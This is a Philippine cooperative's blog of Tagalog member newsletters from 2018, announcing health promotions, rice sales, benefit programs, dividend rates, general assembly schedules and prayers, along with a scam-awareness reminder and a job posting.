Category: Uncategorized

November 3, 2018

NOVALICHES DEVELOPMENT COOPERATIVE
Human Resource Department

Career Opportunity!

 

Interested applicants may apply here or submit their updated resume to Human Resource Department 5th Floor HR office and look for Ms. Kathleen Casupanan. You can also send your resume thru email at novadecihrdept@gmail.com 

Posted in Uncategorized by jojo
June 6, 2018

-June, 2018 Issue No. 43-

NEWS UPDATES

 

PAGPUPUGAY SA AMA NG TAHANAN

Unang ipinagdiwang ang Father’s Day noong ika-19 ng Hunyo taong 1910.
Ayon sa paniniwala, unang ipinagdiwang ito sa Washington na pinangunahan ni Sonora Dodd, bilang pagbibigay-pugay sa kanyang ama. Ipinagdiriwang na noon ang Mother’s Day tuwing Mayo, at dahil siya ay wala nang ina (na  namatay sa panganganak), naisip nyang ipagdiwang ang Father’s Day para sa kanyang ama na tumayong magulang sa kanilang magkakapatid.
Bagaman iba’t ibang petsa ang pagdiriwang nito sa iba’t ibang parte ng mundo, karamihan sa mga bansa, kabilang  ang Pilipinas, ay ipinagdiriwang ito tuwing ika-3 Linggo ng Hunyo (3rd Sunday of June).
Ngayong taon, atin itong ipagdiriwang sa June 17, 2018.
Bilang pagbibigay-pugay at pasasalamat sa mga
Ama ng tahanan, tayo ay magkakaloob ng mga
sumusunod sa JUNE 25, 2018 (MONDAY)
  • Free Blood Uric Acid (BUA) screening
  • Free Blood Sugar screening
  • Free Bone Scan
  • Free Prostate Check-up (June 21, 2018)
UNANG DALAWAMPUNG (20) TATAY


PAALALA: MAG-INGAT SA BUDOL-BUDOL

Sila ang mga taong nagagawang magnakaw sa pamamagitan ng pagkuha ng inyong tiwala. Lalapitan ang biktima na umaaktong humihingi ng tulong upang makuha ang tiwala ng biktima at unti-unti ay nakukuha nila ang gusto nila. Madalas ay makikitawag ito na umaaktong may importanteng tawag hanggang sa tatangayin na ang cellphone ng biktima. Kaya’t huwag basta basta magtitiwala. Maging mapanuri sa lahat ng oras.


INAANYAYAHAN ANG MGA KASAPING NAGNANAIS MAGING PUROK LEADERS SA MGA SUMUSUNOD NA AREA:

  1. Brgy. bagbag
  2. brgy. san bartolome
  3. brgy. talipapa, q-hway at sangandaan
  4. brgy. baesa at balon-bato
  5. brgy. 175 at 174 camarin
  6. brgy. commonwealth
  7. tandang sora
  8. lagro
  9. muÑoz
  10. FAIRVIEW

KWALIPIKASYON:

  • kasaping nasa mabuting katayuan (MIGS)
  • may malakas na pangangatawan
  • nakatira sa NABANGGIT NA AREA
  • ang edad ay hindi hihigit sa animnapung (60) taong gulang

Magsadya lamang sa 5th floor, edcom, main office at hanapin si Dir. Nena Espinola – EDCOM Chairperson.



NOVADECI MEMBERS SOCIAL BENEFIT (NMSB) ABULUYAN

Para sa kaalaman ng lahat ang ating huling pagsasaayos ng negative sa Abuluyan ay hanggang sa December 2018 na lamang.  Kung sakaling hindi ninyo ito mababayaran, kayo ay ituturing  nang bagong kasapi ng NMSB. Kasabay ng pagkawala ng inyong pagkakataong mapakinabangan ang mga serbisyo tulad ng exemption sa pag-abuloy, cash Advance na 50,000.00, pension at disability. Kaya’t amin pong inaanyayaran ang lahat na magtungo sa opisina upang mapag-usapan ang inyong mga account.
Nais po naming ipabatid na ang ICPR at Christmas give away ay ilalaan sa pondo ng inyong abuluyan at ituturing kayong bagong kasapi sa taong 2019.  Ang kapasyahang ito  ay iiral sa unang araw ng 2019. Hinihiling namin ang inyong pakikipagtulungan.

SOCIAL SECURITY SYSTEM

Sa ating mga kamay-ari na nahinto at nais ipagpatuloy ang kanilang paghuhulog sa SSS, ay puwede ng pumunta sa opisina upang ipagpatuloy ito. Sa ating mga kamay-ari naman na self employed na nais magkaroon ng SSS ay pumunta lamang sa opisina upang ma proseso ang inyong  voluntary membership contribution. Magsadya lamang sa ground floor, Allied Department at hanapin si Ms. Beverly Libertad.


COOPERATIVE RICE

Patuloy po nating tangkilikin ang ating coop rice. Ang ating mga bigas ay available sa packaging: 2kls, 5kls at 25kls. Varieties: Well Milled Rice, Sinandomeng, Super Angelica, IR-64 (Premium Graded) at Jasmine sa mababang halaga. “Natulungan na natin ang ating mga magsasaka, natangkilik pa natin ang    serbisyo ng ating kooperatiba.”Puwede rin i-avail ang rice loan at maaaring bayaran sa loob ng isang buwan.


PAUNAWA – CHANGE OF STATUS

Sa mga kamay-ari na nagkaroon ng pagpapalit ng status, pangalan, tirahan, cellphone number, dependents at beneficiaries, magsadya lamang sa Ground floor, Allied Department, Main Office at hanapin si G. Christian Conejar upang ma-update. Mahalagang ma-update ang mga ito upang maiwasan ang anumang problema sa mga susunod na panahon.



MAG-IMPOK HABANG BATA – “Maging malaya sa pananalapi”

Katagang madalas nasasambit ng mga matatanda dahilan sa ito’y napagdaanan na nila at nagkaroon ng malaking aral sa kanila.

 

Ikaw ba ay isang tunay na NOVADECIAN? Patunayan ito, sapagkat ang tunay na NOVADECIAN ay may ipon at seguardo sa kanyang pagtanda.

 

Tangkilikin ang mga serbisyo at produkto ng ating kooperatiba.

Maging aktibo sa pakikibahagi sa ating mga serbisyo at produkto na kung saan ito ay magiging malaking bahagi para sa kapakanan sa hinaharap. Tulad ng mga sumusunod na serbisyo:

 

  • SAVINGS DEPOSIT na may .70% na taunang interest
  • PREFERRED SHARE CAPITAL na may katumbas ng ICPR / Annum (Retirement Benefit, non withdrawable for 5 years)
  • NOVADECI HEALTH CARE PROGRAM – Free Check-up, Hospitalization Benefit, Annual Laboratory Test, etc.
  • TIME DEPOSIT – Invest, Wait and Earn (up to 3.25% interest rate)
  • NOVADECI MEMBERS SOCIAL BENEFIT – Pension Benefit, Death Benefit (Max. of P250,000)
  • INSURANCE – maging insured sa halagang P100-P1,000.

 

Hindi pa huli ang lahat. Ito ang araw ng simula, maglaan ng ipon para sa kapakanan mo at ng inyong pamilya sa panahong tayo ay mawala sa mundo. Ang pamilya ay magpapatuloy ang buhay dahil sa ating maiiwan sa kanila.

 

Makipag-ugnayan sa pinakamalapit na sangay ng NOVADECI sa inyong lugar.



TAGUMPAY NG NOVADECI, 
TAGUMPAY NG KASAPI
Bilang pagpupugay sa ating lahat, nais naming ibahagi sa mga kamay-ari, na ang ating NOVADECI ay ginawaran ng mga parangal nitong nakaraang mga Federation General Assembly na ginanap noong Mayo ng taong kasalukuyan. Ang mga Federation na ito ay ang mga sumusunod:
TAGCODEC (Tagalog Cooperative Development Center)
  1. Highest Coop-Pesos Rating for the Year 2017
  2. 2nd Highest Percentage Growth in Net Surplus for the Year 2017
  3. Highest Number of Delegates (9 Delegates)
  4. Highest Paid Up Share Capital
CLIMBS (Coop Life Insurance and Mutual Benefits Services)
  1. 2017 Top Producer Award
  2. Fresh Capital Infusion
CIFL (CLIMBS Institute for Financial Literacy)
  1. Increase of Contribution to the Institute Training Fund
NATCCO (National Confederation of Cooperatives)
  1. Top Training Patron for the Year 2017
NCMF (National Cooperative Marketing Federation)
  1. Highest Number of Participants
  2. Top member – Rice Distributor
Muli, binabati namin ang bawat kamay-ari sa ating tagumpay na nakamit! Ang NOVADECI ay patuloy na magbibigay ng magandang serbisyo sa ating organisasyon para sa ikakaunlad pa nating lahat. Tagumpay ng NOVADECI ay tagumpay din nating mga KAMAY-ARI. Mabuhay ang NOVADECI!


MEDICAL SCHEDULES
MAIN OFFICE – Monday to Saturday
•Medical Clinic – 7am to 4pm
•Laboratory Services – 7am to 5pm
•Pharmacy Services – 7am to 6pm
•Pulse Tron Services – 8am to 5pm
•NHCP APE Services – 7am to 10am
•Radiology Services – 8am to 5pm
CAMARIN BRANCH
Tuesday, Wednesday, Saturday
10am to 3pm


SORPRESANG HANDOG

para sa mga magdadagdag ng Share Capital o Preferred Share at tatangkilik sa mga serbisyo ng NOVADECI tulad ng bigas, SSS, Insurance, Pharmacy products at iba pa.



PANALANGIN

Amang banal, aming Panginoon, sinasamba at pinapupurihan ka namin sa iyong kabutihan. Dakila ang iyong pangalan kaya karapat-dapat at alayan ng pagsamba. Salamat Panginoon sa lahat ng biyayang aming natatanggap at maging pag-iingat mo saan man kami mapadako. Hinihingi din po namin ng kapatawaran sa inyong harapan ang aming mga nagawang kasalanan sa hindi namin pagiging tapat sayo at sa aming kapwa. Tulungan mo po kaming makasunod sa inyong banal na kalooban. Pagpalain mo nawa ang aming buhay sa araw-araw, gabayan sa lahat ng desisyon na aming gagawin. Ibuhos mo po ang masaganang biyaya maging sa aming kooperatiba at bawat kasapi nito. Panginoon, maraming salamat po sa walang hanggang pag-ibig Mo sa amin. Ito ang aming samo’t dalangin sa pangalan ni Hesus,

Amen.

Posted in Uncategorized by Edison Bacarisas
June 6, 2018

-May, 2018 Issue No. 42-

NEWS UPDATES

ANG PAGMAMAHAL NG ISANG INA

Ang araw ng mga ina ay ating ipinagdiriwang tuwing ikalawang linggo ng buwan ng Mayo kada taon. Ito ay ipinagdiriwang sa maraming lugar sa mundo kabilang na ang Pilipinas. Sa ating buhay, napakahalaga ng isang ina. Isang ina na nagluwal at nagbigay buhay sa atin, isang ina na nagmamalasakit, nagsasakripisyo, bukas ang kaisipan at handang makinig at higit sa lahat, handang ibigay ang buhay para sa pamilya.

Bilang pagbibigay pugay sa lahat ng mga ina, ang NOVADECI ay kabilang sa mga magbibigay halaga at bilang pagpaparangal sa kanila at pasasalamat sa lahat ng mga ina, ang NOVADECI ay magsasagawa ng mga sumusunod na serbisyo at promo na gaganapin sa NOVADECI Main Office:

Medical Department (May 7 to 12, 2018)
  • Libreng breast examination
  • Libreng 30 minutes pulsetron therapy
  • 50% discount sa papsmear
  • Libreng ABI (Ankle Brachial Index) sa unang 20 pasyente
PROMO (May 7 to 9, 2018)
  • Libreng Hair Cut
  • Libreng Massage
  • Libreng T-shirt sa mga nanay na magpapamember sa NOVADECI sa buwan ng Mayo

Ang lahat ng ito ay para lamang sa mga pinakamamahal nating mga INA.



 

B alik aral ay mahalaga

A tin itong daluhan upang

L along mapalago ang ating kaalaman

I to’y sadyang para sayo

K amay-ari

 

A ng pagpapahalaga sa pagdalo dito ay

R amdam ng pamunuan

A t ng sa gayon lalo pang mapagbuti ang

L ahat ng serbisyong laan para sa buong kasapian.

Maging updated!!! IBA NA ANG MAY ALAM…

 

Maaaring dumalo sa araw ng Huwebes, pumili ng oras sa umaga 9am-12nn o sa hapon 2-5pm sa 5th floor, EDCOM, Main Office at tuwing Martes naman sa Camarin Caloocan Branch 9am-12nn sa umaga o 2-5pm naman sa hapon.

 

Sa balik-aral, matututunan ang pag-compute ng rebates, LGF or loan guarantee fund. Kaalaman sa SPB o share protection benefit, masagot ang inyong katanungan sa ibat ibang serbisyo ng ating samahan (NMSB, NHCP, Loans, Insurance, SSS at iba pa)

Mayroon pang tsansang manalo ng mga pa premyo…

May natutunan kana. May premyo ka pa.



PAALALA

PATULOY PO ANG PAMAMAHAGI NG “SHARE CAPITAL CERTIFICATE” PARA SA LAHAT NG KASAPI.  ITO AY SERTIPIKO NA KATUMBAS NG INYONG SOSYO KAPITAL AT NANGANGAHULUGAN NG PAGIGING KAMAY-ARI NATIN SA ATING KOOPERATIBA.
MAGTUNGO LAMANG PO SA GROUND FLR. ALLIED DEPT AT HANAPIN SI MR. IAN CONEJAR PARA SA IBA PANG KATANUNGAN.

PAUNAWA

Sa mga kamay-ari na nagkaroon ng pagpapalit ng relationship status, pangalan, tirahan, cellphone number, dependents at beneficiaries, magsadya lamang sa Ground floor Allied Department at hanapin si Mr. CHRISTIan Conejar.


PAGSASAAYOS NG ACCOUNT

Sa mga kamay-aring nagnanais maisaayos ang kanilang pagkakautang.
Minsan sa ating buhay, hindi natin maiiwasang dumaan sa pagsubok lalo na’t patungkol sa pinansyal na suliranin. Minsan  maganda ang takbo ng ating negosyo ngunit may pagkakataong dumaranas tayo ng pagkalugi. Kailangan lamang nating harapin nang positibo ang buhay. Dasal at tiwala sa sarili at sa Panginoon ang mabisang sandata upang mapagtagumpayan ang bawat hamon ng buhay. Sa ating kasaping nagkaroon ng problema sa pagkakautang sa ating kooperatiba, nais pa rin ng ating pamunuan na makatulong upang maisaayos ang inyong account. Bukas po ang ating tanggapan upang tumugon at makinig sa inyong pangangailangan. Mangyaring makipag-ugnayan lamang sa ating Loan          Department, 3rd floor upang matulungan kayo kung paano maiayos ang inyong account.

RICE

Patuloy po nating tangkilikin ang ating coop rice. Ang ating mga bigas ay available sa packaging: 2kls, 5kls at 25kls. Varieties: Well Milled Rice, Sinandomeng, Super Angelica, IR-64 (Premium Graded) at Jasmine sa mababang halaga. “Natulungan na natin ang ating mga magsasaka, natangkilik pa natin ang    serbisyo ng ating kooperatiba.”Puwede rin i-avail ang rice loan at maaaring bayaran sa loob ng isang buwan.


MAHALAGANG ANUNSYO PATUNGKOL SA NHCP (PROGRAMANG PANGKALUSUGAN)

ALAM NYO BA NA MAY TATLONG OPSYON NG PAGBABAYAD NG NHCP? TATLONG PARAAN NG PAG-BAYAYAD NG TAUNANG PREMIUM

OPTION 1 – P600

 OPTION 2 – P1,000

OPTION 3 – P1,500

KONSULTATIONLIBRELIBRELIBRE
BENEPISYONG PANG HOSPITALMAXIMUM OF (P2,500.00–10,000.00) sakop ang mga kaukulang dependentsMAXIMUM OF (P2,500.00–10,000.00) sakop ang mga kaukulang dependentsMAXIMUM OF (P3,750.00–15,000.00) sakop ang mga kaukulang dependents
LABORATORYO (kapag hindi nagamit ang benepisyong pang hospital)Fasting Blood Sugar at UrinalysisComplete (9) Laboratory testComplete (9) Laboratory test
BENEPISYO para sa PANGANGANAKKailangan isang (1) taon ng kasapi sa NHCPKailangan isang (1) taon ng kasapi sa NHCPKailangan isang (1) taon ng kasapi sa NHCP
ACCIDENT LIFE INSURANCE (upon death)WALAWALAworth P5,000.00


COOP AKSI

Para sa karagdagang proteksyon sa atin at sa ating pamilya, ang ating kooperatiba ay naghahandog ng panibagong Insurance, ang COOP AKSI na kung saan ang layunin nito ay maproteksyunan ang bawat indibidwal na makakaranas ng aksidente sa labas man o loob ng ating pinagtatrabahuhan o bahay o maging sa ating paglalakbay. Narito po ang Coverage ng COOP Aksi:

BRONZE PACKAGE

(P100.00 / ANNUM)

SILVER PACKAGE

(P185.00 / ANNUM)

GOLD PACKAGE

(P330.00 / ANNUM)

Accidental Death WORTH P20,000.00, Disablement and Dismemberment (per schedule)Accidental Death WORTH P50,000.00, Disablement and Dismemberment (per schedule)Accidental Death WORTH P100,000.00, Disablement and Dismemberment (per schedule)
Unprovoked Murder & Assault WORTH P10,000.00Unprovoked Murder & Assault WORTH P20,000.00Unprovoked Murder & Assault WORTH P50,000.00
Accident Medical Reimbursement WORTH P2,000.00Accident Medical Reimbursement WORTH P5,000.00Accident Medical Reimbursement WORTH P10,000.00
Hospital Income Rider due to accident (max of 7 days per policy) WORTH P100.00/dayHospital Income Rider due to accident (max of 7 days per policy) WORTH P200.00/dayHospital Income Rider due to accident (max of 7 days per policy) WORTH P300.00/day

AGE ELIGIBILITY: 18 to 69 years old

Para po sa inyong mga katanungan, magtungo po sa ating opisina sa Ground Floor Main Office at hanapin si Ms. PIA at Ms. LEZEIL sa Caloocan-NOVADECI Camarin Branch.



SOCIAL SECURITY SYSTEM

Sa ating mga kamay-ari na nahinto at nais ipagpatuloy ang kanilang paghuhulog sa SSS, ay puwede ng pumunta sa opisina upang ipagpatuloy ito. Sa ating mga kamay-ari naman na self employed na nais magkaroon ng SSS ay pumunta lamang sa opisina upang ma proseso ang inyong  voluntary membership contribution. Magsadya lamang sa ground floor, Allied Department at hanapin si Ms. Beverly Libertad.


PANALANGIN

Diyos na makapangyarihan, pinupuri at sinasamba ka namin O Diyos na banal napakabuti mo sa amin sa lahat ng sandali. Lagi kang nakaagapay sa amin habang patuloy kaming naglalakbay sa daigdig na iyong kaloob. Subalit sa kabila ng iyong kabutihan Ama, patuloy pa rin kaming nakakalimot sa iyo. Patawad, Ama, patawad. Tanggapin mo ang taos puso naming pagsisisi sa aming mga pagkakasala kaalinsabay ng pag-usal ng panalangin ng pasasalamat sa iyo dahil hindi mo kami pinababayaan. Salamat Ama sa biyaya, salamat sa kapanatagan ng isipan sa mapayapang buhay at higit sa lahat sa patuloy na pagpapahiram mo sa amin ng buhay na aming taglay. Isinasamo namin sa iyo sa walang hanggang pagmamahal mo sa amin na huwag mo kaming bibitawan nang sa gayon ay hindi kami malihis ng landas. Nawa, bawat isa sa amin ay makasunod sa dakila mong kalooban. Hinihiling namin ito sa matamis na pangalan ng iyong anak na si Hesukristo kasama ng Banal na Espirito Santo Diyos magpasawalang hanggan,

Amen.

Posted in Uncategorized by Edison Bacarisas
April 19, 2018

-April, 2018 Issue No. 41-

NEWS UPDATES

PREFERRED SHARE

Ang Preferred Share ay nagsimula na. Tumatanggap na tayo ng inyong mga deposito para dito. Layunin nito na mapaghandaan natin ang ating retirement o pagtanda. Sinisikap ng ating samahan na mabigyan kayo ng mga kaparaanan upang maging isang malayang tao sa hinaharap. Ang patuloy na pagsisikap natin habang tayo ay malakas pa ay isang sandigan ng tagumpay, ngunit kailangan natin magkaroon ng mga mekanismo na ang ating mga pinaghirapan ay hindi mapupunta sa wala. Ang NOVADECI ay patuloy na nagbibigay ng pag-aaral upang magkaroon tayo ng tamang pamamahala sa ating kabuhayan. Kasama sa ating pangarap na maging handa tayo sa anumang pagsubok ng buhay. Magagawa lamang natin ito kung patuloy natin lilinangin ang ating mga sarili. Sana sa ating pagtanda hindi tayo labis na nag-aalala sa ating araw-araw na pangangailan kaya’t atin itong paghandaan. Ang programang preferred share ang inihanda ng NOVADECI para dito. Para sa anumang katanungan maaari kayong makipag-usap sa mga satellites head at branch manager.



PAALALA

PATULOY PO ANG PAMAMAHAGI NG “SHARE CAPITAL CERTIFICATE” PARA SA LAHAT NG KASAPI.  ITO AY SERTIPIKO NA KATUMBAS NG INYONG SOSYO KAPITAL AT NANGANGAHULUGAN NG PAGIGING KAMAY-ARI NATIN SA ATING KOOPERATIBA.
MAGTUNGO LAMANG PO SA GROUND FLR. ALLIED DEPT AT HANAPIN SI MR. IAN CONEJAR PARA SA IBA PANG KATANUNGAN.


SOCIAL SECURITY SYSTEM

Ang NOVADECI ay partner agent na ng SSS. Sa ating mga kamay-ari na nahinto at nais ipagpatuloy ang kanilang paghuhulog, ay atin na pong tinatanggap. Magsadya lamang po sa ground floor, Allied Services Department para sa inyong mga katanungan.

Sa mga kamay-ari na nais maging miyembro ng SSS, tumatanggap din po tayo ng aplikasyon edad 18-60 years old.

Rice

Patuloy po nating tangkilikin ang ating coop rice. ang ating mga bigas ay available sa packaging: 2kls, 5kls at 25kls. Varieties: Well milled rice, Sinandomeng, Super Angelica, IR-64 (Premium graded) at Jasmine sa mababang halaga. “Natulungan na natin ang ating mga magsasaka, natangkilik pa natin ang serbisyo ng ating kooperatiba.”



NOVADECI MEMBERS SOCIAL BENEFIT (NMSB)

Patuloy po nating i-update ang ating pondo sa Damayan upang hindi maantala ang pagkakaloob ng benepisyong pandamayan. Maaaring mag-inquire sa ating opisina para malaman ang balanse sa Damayan sa pamamagitan ng pagtawag sa telepono 576-2667 loc. 102 o cellphone 09338673773 (Allied Department). Kung nagkaroon naman po ng pagbabago sa inyong mga contact numbers ay agad ipagbigay-alam sa ating opisina upang ma-update ang inyong record.



MAHALAGANG ANUNSYO PATUNGKOL SA NHCP (PROGRAMANG PANGKALUSUGAN)

ALAM NYO BA NA MAY TATLONG OPSYON NG PAGBABAYAD NG NHCP? TATLONG PARAAN NG PAG-BAYAYAD NG TAUNANG PREMIUM

OPTION 1 – P600.00

-LIBRENG KONSULTASYON
-HOSPITAL BENEFIT OF MAXIMUM OF (P2,500.00 – 10,000.00)
  sakop ang mga kaukulang dependents
-LIBRENG LABORATORY EXAM makalipas ang
  (1) TAON (Kapalit ng hindi paggamit ng
hospitalization benefit)
-FREE FBS
-Urinalysis
-MATERNITY BENEFIT (1)taon ng Kasapi ng NHCP

OPTION 2 – P1,000.00

-LIBRENG KONSULTASYON
-HOSPITAL BENEFIT OF MAXIMUM OF (P2,500.00 – 10,000.00)
  sakop ang mga kaukulang dependents
-LIBRENG LABORATORY EXAM makalipas ang
  (1) TAON (Kapalit ng hindi paggamit ng
hospitalization benefit)
-Complete laboratory test
-MATERNITY BENEFIT (1)taon ng Kasapi ng NHCP

OPTION 3 – P1,500.00

-LIBRENG KONSULTASYON
-HOSPITAL BENEFIT OF MAXIMUM OF (P3,750.00 – 15,000.00)
  sakop ang mga kaukulang dependents
-LIBRENG LABORATORY EXAM makalipas ang
  (1) TAON (Kapalit ng hindi paggamit ng
hospitalization benefit)
-Complete laboratory test
-MATERNITY BENEFIT (1)taon ng Kasapi ng NHCP
-P5,000.00 WORTH OF ACCIDENT INSURANCE (upon death)


Medical corner WORLD HEALTH MONTH

Ang buwan ng Abril ay itinalaga bilang World Health Month. Panatilihing malusog ang ating pangangatawan sa pamamagitan ng tamang pagkain at ehersisyo. Alamin din ang inyong Body Mass Index (BMI) na siyang nagsasabi kung kayo ay nasa tamang pangangatawan  sapagkat ang overweight ay maraming kaakibat na sakit katulad ng hypertension, diabetes, mataas na cholesterol at marami pang iba.
Ugaliin din  na gamitin ang inyong annual physical check-up na maaari ninyong ma-avail sa ating medical services sa loob ng dalawang (2) buwan matapos ang anniversary date ng inyong NHCP kung kayo ay hindi  nakagamit ng hospitalization claims.
Isang paalala mula sa NOVADECI medical services.

SINO SI MIGS? KILALA MO BA SI MIGS?

MIGS – ang ibig sabihin sa salitang Ingles ay “Member In Good Standing” sa Tagalog ay mabuting kasapi. Lahat tayong kasapi ng Novadeci ay inaasahan na MIGS o nasa mabuting katayuan bilang kasapi ng ating kooperatiba. Kaisa nga ba tayo sa pagiging isang MIGS member? Paano ba ang maging MIGS? Kung ikaw ay:

  1. Kasapi ng NMSB – nag-aambag sa panahon ng pagpanaw ng kapwa kasapi o kaanak ng kasapi
  2. Kasapi ng NHCP – bayad ng taunang premium pangkalusugan (600, 1000 o 1,500)
  3. Hindi nagpabaya sa lahat ng uri ng pagkakautang sa kooperatiba (walang Past due Loan).
  4. Dumalo at nakaboto sa huling pangkalahatang pagpupulong
  5. Naglalagak taun-taon ng Share capital  P1,500.00 o higit pa kada taon  ayon sa iyong kita.
  6. Mayroong Multi-Purpose Share Capital na hindi bababa ng P500.00
  7. Naging bahagi sa pagdalo sa pagrepaso ng mga patakaran, pag-aaral sa gawaing pang kooperatiba (talakayan, balik-aral,  sectoral meeting, ownership forum) para sa ikabubuti ng buong samahan.

Walang duda IKAW AY ISANG MIGS. Kaya’t hikayatin ang ating mga kakilala, Magtulungan tayo upang maging MIGS ang bawat isa.



 

MAGANDANG BALITA!

Malugod po naming ibinabalita sa inyo na sa buwan ng Pebrero naabot na natin ang isang bilyon Share Capital. Ayon sa ating ulat sa Board of Directors, sa pagsasara ng libro sa buwan ng Pebrero, ang ating total Share Capital Contribution ay umabot na sa halagang 1,008,548,576. Salamat po sa inyong lahat dahil tayong mga kamay-ari ang bumubuo ng lahat ng ito. Ang pagpapala ng Diyos ay sumainyong lahat. Sinisikap po namin na ang paglagong ito ay madama ng bawa’t kamay-ari. Nawa’y patuloy tayong makalikha ng mga mekanismo paano natin naibabalik ang serbisyo sa lahat at walang maiiwanan. Inaanyayahan po namin kayo na patuloy na makipag-ugnayan sa ating opisina upang maghain ng mga panukala para sa ikagaganda ng lahat. Dahil ang NOVADECI ay isa sa mga pinupuntahan ng iba’t-ibang kooperatiba sa buong bansa upang unawain ang ating mga serbisyo. Sa tagumpay na ito, patuloy tayong nagbibigay inspirasyon sa kilusang kooperatiba. Muli, Salamat po sa inyong pagtitiwala.


Sa lahat po ng nais magbenta ng lupa sa NOVADECI , Kailangan po na magsubmit ng offer to sell upang maging bahagi ng Agenda sa meeting ng Board of Directors. Maaari pong isumite sa General Manager’s Office anumang araw maliban sa linggo at holidays.


PARA PO SA MGA KATANUNGAN NA HINDI NASAGOT NOONG GENERAL ASSEMBLY, MANGYARING MAGSADYA SA OPISINA O MAG-EMAIL SA NOVADECI1976@NOVADECI.COM UPANG PERSONAL NA MASAGOT NG TAGAPAMAHALA AT PAMUNUAN.


PANALANGIN

Panginoong Hesus pinupuri at sinasamba ka namin sa inyong kabutihan, dakila at banal ang inyong pangalan marapat kang sambahin at pasalamatan. Salamat panginoon sa pag-ibig at kabutihan mo na di magmamaliw. Humihingi din po kami ng kapatawaran sa aming mga kasalanan at igawad sa bawat isa ang biyaya at habag mo. Tangi po naming dalangin ang inyo po kaming gabayan at pagpalain sa aming buhay sa araw-araw maging ang aming kooperatiba at bawat kasapi nito. Bigyan mo kami ng pusong mapagkumbaba at pusong matulungin sa aming kapwa. Maraming salamat aming Panginoon. Ito ang aming samo’t dalangin sa pangalan ni Hesus,

Amen.


Mga Kamay-Ari… Ang pamunuan at management ay lubos na nagpapasalamat sa inyong pagdalo sa ating 42nd Annual General Assembly at pakikiisa sa paghalal sa ating pamunuan. Nawa’ymagpatuloy pa ang pakikilahok ng bawat isa sa lahat ng gawain ng ating kooperatiba, tungo sa pag-unlad! Muli, Maraming Salamat sa inyong lahat! 

Posted in Uncategorized by Edison Bacarisas
April 19, 2018

-March, 2018 Issue No. 40-

NEWS UPDATES

 

Balitang Interest on Capital and Patronage Refund (ICPR) 2017 operation

Nais po naming ipaalam sa lahat na ang Interest on Capital at Patronage refund ay available na mula Marso 13, 2018.  Ang  interest on Capital natin ngayon ay nasa 7.64 % at ang ating Patronage  Refund ay 12.28%.  Maaari na kayong magwithdraw kung kayo ay MIGS at may mahigit na  one hundred thousand ang inyong share capital.  Ang mapupuntahan ng  inyong ICPR ay ayon sa sumusunod na pamamaraan:
  1. NHCP kung hindi pa kayo bayad sa contribution.
  2. NMSB kung kulang na ang pondo
  3. Loan kung may arrears/Fines and charges
  4. Share Capital/Saving Deposit kung walang problema sa lahat ng nakasaad sa 1-3, ayon sa nakasaad na batayan sa ibaba:
     Share Capital     Saan nakalagay ang ICPR

1,500-14,999

15,000- 99,999

100,000 up

100% share Capital

50%SC 50% Saving

100% Saving Deposit

Note:
Kung ang kasapi ay may Past Due Account (PDL) at iba pang bayarin, ang sumusunod ang paglalagyan:
  1. Loan Gurantee Fund Payables
  2. Fines and Charges
  3. Co-maker Deduction.

Sinisikap nating makagawa ng mga kaparaanan upang makadalo kayo sa ating 42nd General Assembly kaya’t sa kabila ng pagkukulang sa pondo sa NMSB at NHCP kung kayang punuan ng ICPR ay ginagawa ng management. Hinihiling po namin ang inyong malawak na pag-unawa. Kita kita po tayo sa ating Pangkalahatang Pagpupulong.



PAANYAYA at PAALALA

Para po sa paghahanda ng ating General Assembly, narito ang mga sumusunod na schedule para sa kaalaman ng lahat

March 6, 2018

Cut off ng Member in Good standing para makadalo sa General Assembly. Hinihiling na kung may kakulangan sa NMSB, NHCP, Share Capital at utang, dapat mabayaran sa nasabing date. 2017 members cut-off date of MIGS – December 29, 2017

March. 13-15, 2018

Pre-Registration date sa lahat ng opisina. Tanging ang MIGS lamang ang pwedeng magparehistro nang maaga upang maiwasan ang mahabang pila sa General Assembly

March 17, 2018

General Assembly na magsisimula ng alas 9 ng umaga. Mahalagang makadalo ng maaga sapagkat nag-imbita tayo ng mga speakers na higit na makakadagdag sa ating kaalaman.

Sa mga nag-seminar na kulang pa ang requirements, mangyari lamang na ipasa ito upang makuha ang inyong passbook. Magsadya lamang sa EDCOM, 5th floor, Main Office at hanapin si Ms. Ruby o Mr. Jhao.


Mahalagang Anunsyo

Maaari na pong kunin ang inyong “SHARE CAPITAL CERTIFICATE”. Ito ay sertipiko ng inyong sosyo kapital sa ating kooperatiba. Mahalagang ingatan natin ito dahil atin ito.
Magtungo sa ground floor, Allied Services Department at hanapin si Ms. Joy o Mr. Ian para sa iba pang katanungan.

SOCIAL SECURITY SYSTEM

Ang NOVADECI ay partner agent na ng SSS. Sa ating mga kamay-ari na nahinto at nais ipagpatuloy ang kanilang paghuhulog, ay atin na pong tinatanggap. Magsadya lamang po sa ground floor, Allied Services Department para sa inyong mga katanungan.
Sa mga kamay-ari na nais maging miyembro ng SSS, tumatanggap din po tayo ng aplikasyon edad 18-60 years old.

Rice

Patuloy po nating tangkilikin ang ating coop rice. ang ating mga bigas ay available sa packaging: 2kls, 5kls at 25kls. Varieties: Well milled rice, Sinandomeng, Super Angelica, IR-64 (Premium graded) at Jasmine sa mababang halaga. “Natulungan na natin ang ating mga magsasaka, natangkilik pa natin ang serbisyo ng ating kooperatiba.”

NOVADECI MEMBERS SOCIAL BENEFIT (NMSB)

Paano sumali sa NMSB (Abuluyan)

  • Dapat may P 1,500.00 o higit pang share capital
  • P 400.00 ang initial deposit

Mga benepisyo

  • Gabay sa katandaan o Pension
  • Advance partial benefit
  • Disability pension
  • Financial assistance for terminally ill
  • Death benefit – Maximum na halaga ng benepisyo P 250,000.00
  • Patuloy na i-update ang ating mga NMSB (Abuluyan) fund upang maiwasan ang pagkakaantala ng pagbibigay ng benepisyo sa NMSB.
  • 20 years lang mag-aabuloy at maging exempted na.
Para sa anumang katanungan o paglilinaw, magsadya lamang sa ating opisina, Allied Services Department (ground floor) o di kaya’y tumawag sa 576-2667 loc. 102 at hanapin si Ms. Meanne.


Maligayang Buwan ng Kababaihan

Ang Buwan ng Marso ay pagdiriwang ng buong mundo bilang buwan ng kababaihan. Panahon na upang pasalamatan natin ang ating mga kababaihan sa  naging papel nito sa  pagpapalago ng ating  samahan.  Nais nating kilalanin ang naging papel ng kababaihan sa NOVADECI at sa ating bayan. Marami sa atin ay nagbigay ng buong pagtitiwala sa NOVADECI dahil naging kasangga natin ito sa pagharap sa buhay. Sa tuwing nangangailangan tayo ng pandagdag puhunan, tumatakbo tayo sa ating kooperatiba sa tuwing kulang ang naipon natin para sa matrikula ng ating mga anak, NOVADECI ang ating kaagapay.  Kaya’t mahalaga sa atin ang samahang ito.
